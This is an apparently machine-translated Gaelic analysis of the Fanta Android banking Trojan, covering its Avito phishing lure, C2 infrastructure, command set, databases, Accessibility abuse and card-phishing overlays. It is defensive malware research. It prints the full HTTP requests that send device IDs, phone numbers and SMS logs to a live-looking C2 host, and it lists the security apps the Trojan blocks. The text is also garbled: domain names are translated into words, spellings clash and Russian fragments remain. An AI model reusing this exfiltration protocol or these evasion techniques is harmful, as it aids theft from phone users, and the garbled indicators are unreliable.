Aon latha tha thu airson rudeigin a reic air Avito agus, às deidh dhut tuairisgeul mionaideach den toradh agad a phostadh (mar eisimpleir, modal RAM), gheibh thu am brath seo:
Cho luath ‘s a dh’ fhosglas tu an ceangal, chì thu duilleag a tha coltach gu neo-chiontach ag innse dhut, an neach-reic toilichte agus soirbheachail, gun deach ceannach a dhèanamh:
Cho luath ‘s a phutas tu air a’ phutan “Lean air adhart”, thèid faidhle APK le ìomhaigh agus ainm a tha brosnachail le earbsa a luchdachadh sìos chun inneal Android agad. Chuir thu a-steach aplacaid a dh'iarr còraichean Seirbheis Ruigsinneachd airson adhbhar air choireigin, an uairsin nochd uinneag no dhà agus dh'fhalbh iad gu luath agus... Sin agad e.
Bidh thu a’ dol a sgrùdadh do chothromachadh, ach airson adhbhar air choireigin bidh an app bancaidh agad ag iarraidh mion-fhiosrachadh do chairt a-rithist. Às deidh dhut an dàta a chuir a-steach, bidh rudeigin uamhasach a ’tachairt: airson adhbhar air choireigin fhathast neo-shoilleir dhut, tòisichidh airgead a’ dol à sealladh bhon chunntas agad. Tha thu a 'feuchainn ri fuasgladh fhaighinn air an duilgheadas, ach tha am fòn agad a' seasamh an aghaidh: bidh e a 'bruthadh na h-iuchraichean "Air ais" agus "Dachaigh", chan eil e a' tionndadh dheth agus cha leig e leat ceumannan tèarainteachd sam bith a chur an gnìomh. Mar thoradh air an sin, tha thu air fhàgail gun airgead, cha deach do bhathar a cheannach, tha thu troimh-chèile agus iongnadh: dè thachair?
Tha am freagairt sìmplidh: tha thu air fulang leis an Android Trojan Fanta, ball den teaghlach Flexnet. Ciamar a thachair seo? Leig dhuinn mìneachadh a-nis.
Ùghdaran: Andrey Polovinkin, eòlaiche òg ann an mion-sgrùdadh malware, Ivan Pisarev, eòlaiche ann an mion-sgrùdadh malware.
Cuid de staitistig
Chaidh an teaghlach Flexnet de Android Trojans aithneachadh an toiseach air ais ann an 2015. Thar ùine gu math fada de ghnìomhachd, leudaich an teaghlach gu grunn fo-ghnè: Fanta, Limebot, Lipton, msaa. Chan eil an Trojan, a bharrachd air a’ bhun-structar co-cheangailte ris, a’ seasamh fhathast: tha sgeamaichean cuairteachaidh èifeachdach ùra gan leasachadh - anns a’ chùis againn, duilleagan fiasgach àrd-inbhe a tha ag amas air neach-reic sònraichte, agus bidh an luchd-leasachaidh Trojan a’ leantainn ghluasadan fasanta ann an sgrìobhadh bhìoras - a’ cur feartan ùra ris a leigeas leat airgead a ghoid nas èifeachdaiche bho innealan gabhaltach agus dòighean dìon seach-rathad.
Tha an iomairt a tha air a mhìneachadh san artaigil seo ag amas air luchd-cleachdaidh às an Ruis; chaidh àireamh bheag de dh ’innealan gabhaltach a chlàradh san Úcráin, agus eadhon nas lugha ann an Kazakhstan agus Belarus.
Eadhon ged a tha Flexnet air a bhith ann an raon Android Trojan airson còrr air 4 bliadhna a-nis agus air a sgrùdadh gu mionaideach le mòran de luchd-rannsachaidh, tha e fhathast ann an cumadh math. A 'tòiseachadh bhon Fhaoilleach 2019, tha an ìre de mhilleadh a dh'fhaodadh a bhith nas àirde na 35 millean rubles - agus chan eil seo ach airson iomairtean anns an Ruis. Ann an 2015, chaidh diofar dhreachan den Trojan Android seo a reic air fòraman fon talamh, far am faighear cuideachd còd stòr an Trojan le tuairisgeul mionaideach. Tha seo a’ ciallachadh gu bheil na staitistigean mu mhilleadh san t-saoghal eadhon nas drùidhtiche. Chan e droch chomharra airson a leithid de bhodach, nach eil?
Bho reic gu mealladh
Mar a chithear bhon dealbh-sgrìn a chaidh a thaisbeanadh roimhe seo de dhuilleag fiasgach airson an t-seirbheis eadar-lìn airson sanasan a phostadh Avito, chaidh ullachadh airson neach-fulang sònraichte. A rèir coltais, bidh an luchd-ionnsaigh a’ cleachdadh aon de parsers Avito, a bheir a-mach àireamh fòn agus ainm an neach-reic, a bharrachd air tuairisgeul an toraidh. Às deidh dha an duilleag a leudachadh agus am faidhle APK ullachadh, thèid SMS a chuir chun neach-fulang leis an ainm aige agus ceangal gu duilleag fiasgaich anns a bheil tuairisgeul air an toradh aige agus an t-suim a fhuaireadh bho “reic” an toraidh. Le bhith a’ briogadh air a’ phutan, gheibh an neach-cleachdaidh faidhle APK droch-rùnach - Fanta.
Sheall sgrùdadh air an raon shcet491 [.] gu bheil e air a thiomnadh gu frithealaichean DNS Hostinger:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Anns an fhaidhle sòn àrainn tha inntrigidhean a’ comharrachadh nan seòlaidhean IP 31.220.23[.]236, 31.220.23[.]243, agus 31.220.23[.]235. Ach, tha prìomh chlàr ghoireasan an àrainn (Clàr) a’ comharrachadh frithealaiche le seòladh IP 178.132.1[.]240.
Tha seòladh IP 178.132.1[.]240 suidhichte san Òlaind agus buinidh e don òstair Sruth na Cruinne. Tha seòlaidhean IP 31.220.23[.]235, 31.220.23[.]236 agus 31.220.23[.]243 suidhichte san RA agus buinidh iad don fhrithealaiche aoigheachd co-roinnte HOSTINGER. Air a chleachdadh mar neach-clàraidh fosgailte-ru. Dh’ fhuasgail na raointean a leanas cuideachd an seòladh IP 178.132.1[.]240:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Bu chòir a thoirt fa-near gun robh ceanglaichean sa chruth a leanas rim faighinn bho cha mhòr a h-uile raon:
http://(www.){0,1}<%domain%>/[0-9]{7}
Tha an teamplaid seo cuideachd a’ toirt a-steach ceangal bho theachdaireachd SMS. Stèidhichte air dàta eachdraidheil, chaidh a lorg gu bheil aon àrainn a 'freagairt ri grunn cheanglaichean anns a' phàtran a chaidh a mhìneachadh gu h-àrd, a tha a 'sealltainn gun deach aon àrainn a chleachdadh gus an Trojan a sgaoileadh gu grunn luchd-fulaing.
Leig leinn leum air adhart beagan: bidh an Trojan a chaidh a luchdachadh sìos tro cheangal bho SMS a 'cleachdadh an t-seòlaidh mar fhrithealaiche smachd onusedseddohap[.]club. Chaidh an raon seo a chlàradh air 2019-03-12, agus a’ tòiseachadh bho 2019-04-29, bha tagraidhean APK ag eadar-obrachadh leis an raon seo. Stèidhichte air dàta a fhuaireadh bho VirusTotal, bha 109 tagradh gu h-iomlan ag eadar-obrachadh leis an t-seirbheisiche seo. Dh'fhuasgail an àrainn fhèin gu seòladh IP 217.23.14[.]27, suidhichte anns an Òlaind agus leis an neach-aoigheachd Sruth na Cruinne. Air a chleachdadh mar neach-clàraidh ainmcheap. Fuasgladh raointean chun t-seòladh IP seo cuideachd club dona-racoon[.] (a’ tòiseachadh bho 2018-09-25) agus bad-racoon[.]beò (a’ tòiseachadh bho 2018-10-25). Le fearann club dona-racoon[.] bha barrachd air 80 faidhle APK ag eadar-obrachadh leotha bad-racoon[.]beò - barrachd air 100.
San fharsaingeachd, tha an ionnsaigh a 'dol air adhart mar a leanas:
Dè tha fo mhullach Fanta?
Coltach ri mòran Trojans Android eile, tha Fanta comasach air teachdaireachdan SMS a leughadh agus a chuir, a ’dèanamh iarrtasan USSD, agus na h-uinneagan aige fhèin a thaisbeanadh air mullach thagraidhean (a’ toirt a-steach feadhainn bancaidh). Ach, tha arsenal gnìomhachd an teaghlaich seo air ruighinn: thòisich Fanta air a chleachdadh Seirbheis Ruigsinneachd airson diofar adhbharan: a’ leughadh na tha ann am brathan bho thagraidhean eile, a’ cur casg air a bhith a’ lorg agus a’ cur stad air cur an gnìomh Trojan air inneal gabhaltach, msaa. Bidh Fanta ag obair air a h-uile dreach de Android gun a bhith nas òige na 4.4. San artaigil seo bheir sinn sùil nas mionaidiche air an sampall Fanta a leanas:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Dìreach às deidh a chuir air bhog
Dìreach às deidh a chuir air bhog, bidh an Trojan a ’falach an ìomhaigh aige. Chan urrainn don tagradh obrachadh ach mura h-eil ainm an inneal gabhaltach air an liosta:
- Android_x86
- VirtualBox
- Nexus 5X (ceann tairbh)
- Nexus 5 (razor)
Tha an sgrùdadh seo air a dhèanamh ann am prìomh sheirbheis an Trojan - Prìomh Sheirbheis. Nuair a thèid a chuir air bhog airson a’ chiad uair, thèid paramadairean rèiteachaidh an tagraidh a thòiseachadh gu luachan bunaiteach (thèid an cruth airson dàta rèiteachaidh a stòradh agus an ciall a dheasbad nas fhaide air adhart), agus tha inneal gabhaltach ùr clàraichte air an t-seirbheisiche smachd. Thèid iarrtas HTTP POST leis an t-seòrsa teachdaireachd a chuir chun t-seirbheisiche clàradh_bot agus fiosrachadh mun inneal gabhaltach (dreach Android, IMEI, àireamh fòn, ainm gnìomhaiche agus còd dùthcha anns a bheil an gnìomhaiche clàraichte). Tha an seòladh a 'frithealadh mar an fhrithealaiche smachd hXXp://onuseseddohap[.]club/controller.php. Mar fhreagairt, cuiridh am frithealaiche teachdaireachd anns a bheil na raointean bot_id, bot_pwd, frithealaiche - bidh an aplacaid a’ sàbhaladh nan luachan sin mar pharamadairean frithealaiche CNC. Paramadair frithealaiche roghainneil mura d’ fhuaireadh an raon: bidh Fanta a’ cleachdadh an t-seòladh clàraidh - hXXp://onuseseddohap[.]club/controller.php. Faodar gnìomh atharrachadh seòladh CnC a chleachdadh gus dà dhuilgheadas fhuasgladh: an luchd a sgaoileadh gu cothromach eadar grunn luchd-frithealaidh (ma tha àireamh mhòr de dh ’innealan gabhaltach ann, faodaidh an luchd air frithealaiche lìn neo-leasaichte a bhith àrd), agus cuideachd a chleachdadh frithealaiche eile ma dh’ fhàillig fear de na frithealaichean CNC .
Ma thachras mearachd fhad ‘s a thathar a’ cur an iarrtais, nì an Trojan am pròiseas clàraidh a-rithist às deidh 20 diog.
Aon uair ‘s gu bheil an inneal air a chlàradh gu soirbheachail, seallaidh Fanta an teachdaireachd a leanas don neach-cleachdaidh:
Nòta cudromach: an t-seirbheis ris an canar Tèarainteachd siostam - ainm an t-seirbheis Trojan, agus às deidh dhut briogadh air a’ phutan OK Fosglaidh uinneag le roghainnean Ruigsinneachd an inneal le galair, far am feum an neach-cleachdaidh còraichean Ruigsinneachd a thoirt seachad airson na seirbheis droch-rùnach:
Cho luath ‘s a thionndaidheas an neach-cleachdaidh air Seirbheis Ruigsinneachd, Bidh Fanta a’ faighinn cothrom air susbaint uinneagan tagraidh agus na gnìomhan a thèid a dhèanamh annta:
Dìreach às deidh dha còraichean Ruigsinneachd fhaighinn, bidh an Trojan ag iarraidh còraichean rianadair agus còraichean airson brathan a leughadh:
A’ cleachdadh an t-Seirbheis Ruigsinneachd, bidh an aplacaid a’ dèanamh atharrais air iuchraichean, mar sin a’ toirt na còraichean riatanach dha fhèin.
Bidh Fanta a’ cruthachadh grunn eisimpleirean stòr-dàta (a thèid a mhìneachadh nas fhaide air adhart) a tha riatanach gus dàta rèiteachaidh a stòradh, a bharrachd air fiosrachadh a chaidh a chruinneachadh sa phròiseas mun inneal gabhaltach. Gus am fiosrachadh cruinnichte a chuir air falbh, bidh an Trojan a’ cruthachadh gnìomh ath-aithris a chaidh a dhealbhadh gus raointean a luchdachadh sìos bhon stòr-dàta agus àithne fhaighinn bhon t-seirbheisiche smachd. Tha an eadar-ama airson faighinn gu CnC air a shuidheachadh a rèir an dreach Android: ann an cùis 5.1, bidh an eadar-ama 10 diogan, air neo 60 diogan.
Gus an àithne fhaighinn, bidh Fanta a’ dèanamh iarrtas Faigh Task chun an t-seirbheisiche riaghlaidh. Mar fhreagairt, faodaidh CNC aon de na h-òrdughan a leanas a chuir:
| sgioba | Tuairisgeul |
|---|---|
| 0 | Cuir teachdaireachd SMS |
| 1 | Dèan gairm fòn no òrdugh USSD |
| 2 | Luchdaich a-nuas parameter àm |
| 3 | Luchdaich a-nuas parameter bacadh |
| 6 | Luchdaich a-nuas parameter manaidsear sms |
| 9 | Tòisich a 'cruinneachadh teachdaireachdan SMS |
| 11 | Ath-shuidhich am fòn agad gu suidheachadh factaraidh |
| 12 | Dèan comas / cuir à comas logadh de chruthachadh bogsa còmhraidh |
Bidh Fanta cuideachd a’ cruinneachadh fiosan bho 70 aplacaid bancaidh, siostaman pàighidh luath agus e-wallets agus gan stòradh ann an stòr-dàta.
A’ stòradh paramadairean rèiteachaidh
Gus paramadairean rèiteachaidh a stòradh, bidh Fanta a’ cleachdadh dòigh-obrach àbhaisteach airson àrd-ùrlar Android - Preferences- faidhlichean. Thèid na roghainnean a shàbhaladh gu faidhle ainmichte suidheachaidhean. Tha tuairisgeul air na paramadairean a chaidh a shàbhaladh sa chlàr gu h-ìosal.
| ainm | Luach bunaiteach | Luachan comasach | Tuairisgeul |
|---|---|---|---|
| id | 0 | Amalachadh | ID bot |
| frithealaiche | hXXp://onuseseddohap[.]club/ | URL | Seòladh frithealaiche smachd |
| pwd | - | String | Facal-faire an fhrithealaiche |
| àm | 20 | Amalachadh | Eadar-ama. A’ nochdadh dè cho fada ‘s a bu chòir na gnìomhan a leanas a chuir dheth:
|
| bacadh | a h-uile | uile/àireamh tel | Ma tha an raon co-ionann ris an t-sreath a h-uile no àireamh fòn, an uairsin thèid an teachdaireachd SMS a fhuaireadh a chuir a-steach leis an tagradh agus cha tèid a shealltainn don neach-cleachdaidh |
| manaidsear sms | 0 | 0/1 | Dèan comas / cuir à comas an aplacaid mar an neach-faighinn SMS bunaiteach |
| leughDialog | ceàrr | Fìor/meallta | Dèan comas / cuir à comas logadh tachartais Tachartas Ruigsinneachd |
Bidh Fanta cuideachd a’ cleachdadh am faidhle manaidsear sms:
| ainm | Luach bunaiteach | Luachan comasach | Tuairisgeul |
|---|---|---|---|
| pckg | - | String | Ainm manaidsear teachdaireachd SMS a chaidh a chleachdadh |
Eadar-obrachadh le stòran-dàta
Rè a bhith ag obair, bidh an Trojan a 'cleachdadh dà stòr-dàta. Stòr-dàta ainmichte a air a chleachdadh gus diofar fhiosrachadh a chaidh a chruinneachadh bhon fhòn a stòradh. Tha an dàrna stòr-dàta air ainmeachadh fanta.db agus tha e air a chleachdadh gus roghainnean a shàbhaladh le uallach airson uinneagan fiasgach a chruthachadh a chaidh a dhealbhadh gus fiosrachadh a chruinneachadh mu chairtean banca.
Bidh Trojan a 'cleachdadh stòr-dàta а gus fiosrachadh cruinnichte a stòradh agus na gnìomhan agad a chlàradh. Tha dàta air a stòradh ann an clàr logaichean. Gus clàr a chruthachadh, cleachd a’ cheist SQL a leanas:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)Tha am fiosrachadh a leanas san stòr-dàta:
1. Logadh a 'tòiseachadh an uidheam a tha air a ghlacadh le teachdaireachd Thionndaidh am fòn air!
2. Brathan bho thagraidhean. Thèid an teachdaireachd a chruthachadh a rèir an teamplaid a leanas:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Dàta cairt banca bho fhoirmean phishing a chruthaich an Trojan. Paramadair VIEW_NAME faodaidh e bhith mar aon de na leanas:
- AliExpress
- Avito
- Google Play
- Measgachadh <%App Name%>
Tha an teachdaireachd air a logadh a-steach don chruth:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Teachd a-steach / a-mach SMS teachdaireachdan ann an cruth:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Fiosrachadh mun phacaid a chruthaicheas am bogsa deasbaid san cruth:
(<%Package name%>)<%Package information%>
Clàr eisimpleir logaichean:
Is e aon de fheartan Fanta cruinneachadh fiosrachaidh mu chairtean banca. Bidh cruinneachadh dàta a’ tachairt tro bhith a’ cruthachadh uinneagan fiasgaich nuair a dh’fhosglas tu tagraidhean bancaidh. Bidh an Trojan a 'cruthachadh an uinneag phishing dìreach aon turas. Tha fiosrachadh gun deach an uinneag a shealltainn don neach-cleachdaidh air a stòradh ann an clàr suidheachaidhean anns an stòr-dàta fanta.db. Gus stòr-dàta a chruthachadh, cleachd a’ cheist SQL a leanas:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);A h-uile raon clàr suidheachaidhean gu bunaiteach air a thòiseachadh gu 1 (cruthaich uinneag fiasgaich). Às deidh don neach-cleachdaidh an dàta aca a chuir a-steach, thèid an luach a shuidheachadh gu 0. Eisimpleir de raointean bùird suidheachaidhean:
- can_login - tha e an urra ris an raon am foirm a thaisbeanadh nuair a dh’ fhosglas tu tagradh bancaidh
- ciad_banca - nach eil air a chleachdadh
- can_avito - tha e an urra ris an raon am foirm a thaisbeanadh nuair a dh’ fhosglas tu an tagradh Avito
- can_ali - tha e an urra ris an raon am foirm a thaisbeanadh nuair a dh’ fhosglas tu an tagradh Aliexpress
- can_eile - tha e an urra ris an raon am foirm a thaisbeanadh nuair a dh’ fhosglas tu tagradh sam bith bhon liosta: Yula, Pandao, Drom Auto, Wallet. Cairtean lasachaidh is bonus, Aviasales, Glèidheadh, Trivago
- can_cairt - tha e an urra ris an raon am foirm a thaisbeanadh nuair a bhios e fosgailte Google Play
Eadar-obrachadh leis an fhrithealaiche riaghlaidh
Bidh eadar-obrachadh lìonra leis an t-seirbheisiche riaghlaidh a’ tachairt tro phròtacal HTTP. Gus obrachadh leis an lìonra, bidh Fanta a’ cleachdadh an leabharlann mòr-chòrdte Retrofit. Thèid iarrtasan a chuir gu: hXXp://onuseseddohap[.]club/controller.php. Faodar seòladh an fhrithealaiche atharrachadh nuair a bhios tu a’ clàradh air an fhrithealaiche. Faodar briosgaidean a chuir mar fhreagairt bhon fhrithealaiche. Bidh Fanta a’ dèanamh na h-iarrtasan a leanas don fhrithealaiche:
- Bidh clàradh an bot air an t-seirbheisiche smachd a’ tachairt aon uair, nuair a thèid a chuir air bhog an toiseach. Thèid an dàta a leanas mun inneal gabhaltach a chuir chun t-seirbheisiche:
· cookie - briosgaidean a gheibhear bhon t-seirbheisiche (is e sreang falamh a th’ anns an luach bunaiteach)
· modh - sreang seasmhach clàradh_bot
· ro-leasachan - iomlanachd seasmhach 2
· tionndadh_sdk - air a chruthachadh a rèir an teamplaid a leanas: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· imei - IMEI den inneal gabhaltach
· dùthaich - còd na dùthcha anns a bheil an gnìomhaiche clàraichte, ann an cruth ISO
· àireamh - Àireamh fòn
· ghnìomhaiche - ainm gnìomhaicheEisimpleir de dh'iarrtas a chaidh a chur chun an fhrithealaiche:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>Mar fhreagairt don iarrtas, feumaidh am frithealaiche nì JSON a thilleadh anns a bheil na paramadairean a leanas:
· bot_id - ID an inneal gabhaltach. Ma tha bot_id co-ionann ri 0, nì Fanta an t-iarrtas a-rithist.
bot_pwd - facal-faire airson an fhrithealaiche.
frithealaiche - seòladh frithealaiche smachd. Paramadair roghainneil. Mura h-eil am paramadair air a shònrachadh, thèid an seòladh a chaidh a shàbhaladh san tagradh a chleachdadh.Eisimpleir nì JSON:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Iarrtas gus àithne fhaighinn bhon fhrithealaiche. Thèid an dàta a leanas a chur chun an fhrithealaiche:
· cookie - briosgaidean a gheibhear bhon t-seirbheisiche
· bid - id den inneal gabhaltach a fhuaireadh nuair a chaidh an t-iarrtas a chuir clàradh_bot
· pwd - facal-faire airson an fhrithealaiche
· roinn_rianachd - bidh an raon a’ dearbhadh an d’ fhuaireadh còraichean rianadair. Ma chaidh còraichean rianadair fhaighinn, tha an raon co-ionann ri 1a chaochladh 0
· Ruigsinneachd - Inbhe gnìomhachd Seirbheis Ruigsinneachd. Ma chaidh an t-seirbheis a thòiseachadh, tha an luach 1a chaochladh 0
· Manaidsear SMS - a’ sealltainn a bheil an Trojan air a chomasachadh mar an aplacaid bunaiteach airson SMS fhaighinn
· glacadh- - a’ taisbeanadh dè an staid anns a bheil an scrion. Thèid an luach a shuidheachadh 1, ma tha an sgrion air, air dhòigh eile 0;Eisimpleir de dh'iarrtas a chaidh a chur chun an fhrithealaiche:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>A rèir an àithne, faodaidh am frithealaiche rud JSON a thilleadh le diofar pharaimearan:
· sgioba Cuir teachdaireachd SMS: Anns na paramadairean tha an àireamh fòn, teacsa na teachdaireachd SMS agus ID na teachdaireachd a thathar a’ cur. Bithear a’ cleachdadh an aithnichear nuair a chuireas tu teachdaireachd chun an fhrithealaiche le seòrsa suidheachadhSms.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· sgioba Dèan gairm fòn no òrdugh USSD: Tha an àireamh fòn no an àithne a’ tighinn a-steach don bhuidheann freagairt.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· sgioba Atharraich paramadair eadar-ama.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· sgioba Atharraich paramadair intercept.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· sgioba Atharraich raon SmsManager.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· sgioba Cruinnich teachdaireachdan SMS bho inneal gabhaltach.
{ "response": [ { "mode": 9 } ], "status":"ok" }· sgioba Ath-shuidhich am fòn agad gu suidheachadh factaraidh:
{ "response": [ { "mode": 11 } ], "status":"ok" }· sgioba Atharraich paramadair ReadDialog.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- A’ cur teachdaireachd le seòrsa suidheachadhSms. Thèid an t-iarrtas seo a dhèanamh às deidh an àithne a chuir gu bàs Cuir teachdaireachd SMS. Tha an t-iarrtas a’ coimhead mar seo:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Stòr-dàta susbaint a luchdadh a-nuas. Tha aon sreath air a ghluasad a rèir iarrtas. Thèid an dàta a leanas a chur chun an fhrithealaiche:
· cookie - briosgaidean a gheibhear bhon t-seirbheisiche
· modh - sreang seasmhach setSaveInboxSms
· bid - id den inneal gabhaltach a fhuaireadh nuair a chaidh an t-iarrtas a chuir clàradh_bot
· teacsa - teacsa anns a’ chlàr stòr-dàta gnàthach (raon d bhon bhòrd logaichean anns an stòr-dàta а)
· àireamh - ainm a’ chlàr stòr-dàta gnàthach (raon p bhon bhòrd logaichean anns an stòr-dàta а)
· modh_sms - luach iomlan (raon m bhon bhòrd logaichean anns an stòr-dàta а)Tha an t-iarrtas a’ coimhead mar seo:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Ma thèid a chuir gu soirbheachail chun t-seirbheisiche, thèid an loidhne a dhubhadh às bhon chlàr. Eisimpleir de nì JSON a thill am frithealaiche:
{ "response":[], "status":"ok" }
Ag eadar-obrachadh leis an t-Seirbheis Ruigsinneachd
Chaidh Seirbheis Ruigsinneachd a chuir an gnìomh gus innealan Android a dhèanamh nas fhasa a chleachdadh airson daoine le ciorraman. Anns a 'mhòr-chuid de chùisean, tha feum air eadar-obrachadh corporra gus eadar-obrachadh le tagradh. Leigidh an t-Seirbheis Ruigsinneachd leat an dèanamh gu prògramach. Bidh Fanta a’ cleachdadh na seirbheis gus uinneagan meallta a chruthachadh ann an tagraidhean bancaidh agus casg a chuir air luchd-cleachdaidh bho bhith a’ fosgladh roghainnean an t-siostaim agus cuid de thagraidhean.
A’ cleachdadh comas-gnìomh na Seirbheis Ruigsinneachd, bidh an Trojan a’ cumail sùil air atharrachaidhean air eileamaidean air scrion an inneal gabhaltach. Mar a chaidh a mhìneachadh roimhe, tha paramadair anns na roghainnean Fanta le uallach airson gnìomhachd logaidh le bogsaichean còmhraidh - leughDialog. Ma thèid am paramadair seo a shuidheachadh, thèid fiosrachadh mu ainm agus tuairisgeul a’ phacaid a bhrosnaich an tachartas a chur ris an stòr-dàta. Bidh an Trojan a 'coileanadh nan gnìomhan a leanas nuair a thèid tachartasan a bhrosnachadh:
- Simulates putadh air na h-iuchraichean cùil is dachaigh anns na cùisean a leanas:
· ma tha an neach-cleachdaidh airson an inneal aige ath-thòiseachadh
· ma tha an neach-cleachdaidh airson an aplacaid “Avito” a sguabadh às no còraichean-slighe atharrachadh
· ma tha iomradh air an tagradh “Avito” air an duilleag
· nuair a dh’ fhosglas tu an aplacaid Google Play Protect
· nuair a dh’ fhosglas tu duilleagan le roghainnean AccessibilityService
· при возникновении диалогового окна “Безопасность системы”
· nuair a dh’ fhosglas tu an duilleag leis na roghainnean “Tarraing thairis air app eile”.
· nuair a dh'fhosglas tu an duilleag "Iarrtasan", "Ath-bheothachadh agus ath-shuidheachadh", "Ath-shuidheachadh Dàta", "Ath-shuidhich roghainnean", "Pannal Leasachaidh", "Special. cothroman”, “Cothroman sònraichte”, “Còraichean sònraichte”
· ma chaidh an tachartas a chruthachadh le cuid de thagraidhean.Liosta Iarrtasan
- android
- Maighstir Lite
- Maighstir glan
- Clean master airson x86 CPU
- Stiùireadh cead tagraidh Meizu
- Tèarainteachd MIUI
- Maighstir Glan - Antivirus & tasgadan agus inneal-glanaidh sgudail
- Smachdan phàrantan agus GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Tèarainteachd Lìn Beta
- Glanadair bhìoras, antivirus, inneal-glanaidh (Tèarainteachd MAX)
- Mobile AntiVirus Security PRO
- Avast antivirus & dìon an-asgaidh 2019
- Tèarainteachd gluasadach MegaFon
- Dìon AVG airson Xperia
- Tèarainteachd gluasadach
- Malwarebytes Antivirus & Dìon
- Antivirus airson Android 2019
- Maighstir tèarainteachd - Antivirus, VPN, AppLock, àrdachadh
- Antivirus AVG airson Manaidsear Siostam tablet Huawei
- Ruigsinneachd Samsung
- Manaidsear airson fòn 'smart' Samsung
- Maighstir tèarainteachd
- Àrdachadh astar
- dr.web
- Àite tèarainteachd Dr.Web
- Ionad Smachd Mobile Dr.Web
- Dr.Web Tèarainteachd Space Life
- Ionad Smachd Mobile Dr.Web
- Tèarainteachd Antivirus & Mobile
- Kaspersky tèarainteachd-lìn: Antivirus agus dìon
- Beatha Bataraidh Kaspersky: Sàbhaladh & àrdachadh
- Kaspersky Endpoint Security - dìon agus riaghladh
- AVG Antivirus an-asgaidh 2019 - Dìon airson Android
- Antivirus Android
- Norton mobile tèarainteachd agus antivirus
- Antivirus, balla-teine, VPN, tèarainteachd gluasadach
- Tèarainteachd gluasadach: antivirus, VPN, dìon meirle
- Antivirus airson Android a-nuas
- Ma thèid cead iarraidh nuair a chuireas tu teachdaireachd SMS gu àireamh ghoirid, bidh Fanta coltach ri bhith a’ cliogadh air a’ bhogsa-seic Cuimhnich roghainn agus putan a chuir.
- Nuair a dh’ fheuchas tu ri còraichean rianadair a thoirt air falbh bhon Trojan, bidh e a’ glasadh scrion a’ fòn.
- A 'cur casg air luchd-rianachd ùr a chur ris.
- Ma tha an aplacaid antivirus dr.web lorg e bagairt, bidh Fanta ag atharrais a’ putadh air a’ phutan seachnaidh.
- Bidh an Trojan coltach ri putadh air a’ phutan air ais is dhachaigh ma chaidh an tachartas a chruthachadh leis an tagradh Cùram inneal Samsung.
- Bidh Fanta a’ cruthachadh uinneagan fiasgaich le foirmean airson fiosrachadh a chuir a-steach mu chairtean banca ma chaidh tagradh bho liosta de mu 30 diofar sheirbheisean eadar-lìn a chuir air bhog. Nam measg: AliExpress, Glèidheadh, Avito, Google Play Market Component, Pandao, Drom Auto, msaa.
Foirmean phishing
Bidh Fanta a’ dèanamh anailis air na h-aplacaidean a tha a’ ruith air an inneal gabhaltach. Ma chaidh tagradh inntinneach fhosgladh, tha an Trojan a’ taisbeanadh uinneag fiasgaich a bharrachd air a h-uile càil eile, a tha na fhoirm airson fiosrachadh cairt banca a chuir a-steach. Feumaidh an neach-cleachdaidh an dàta a leanas a chuir a-steach:
- Àireamh cairt
- Ceann-latha crìochnachaidh cairt
- CVV
- Ainm neach-cairt (chan ann airson a h-uile banca)
A rèir an tagraidh ruith, thèid diofar uinneagan fiasgach a thaisbeanadh. Gu h-ìosal tha eisimpleirean de chuid dhiubh:
AliExpress:
Avito:
Airson cuid de thagraidhean eile, m.e. Margaidh Google Play, Aviasales, Pandao, Glèidheadh, Trivago:
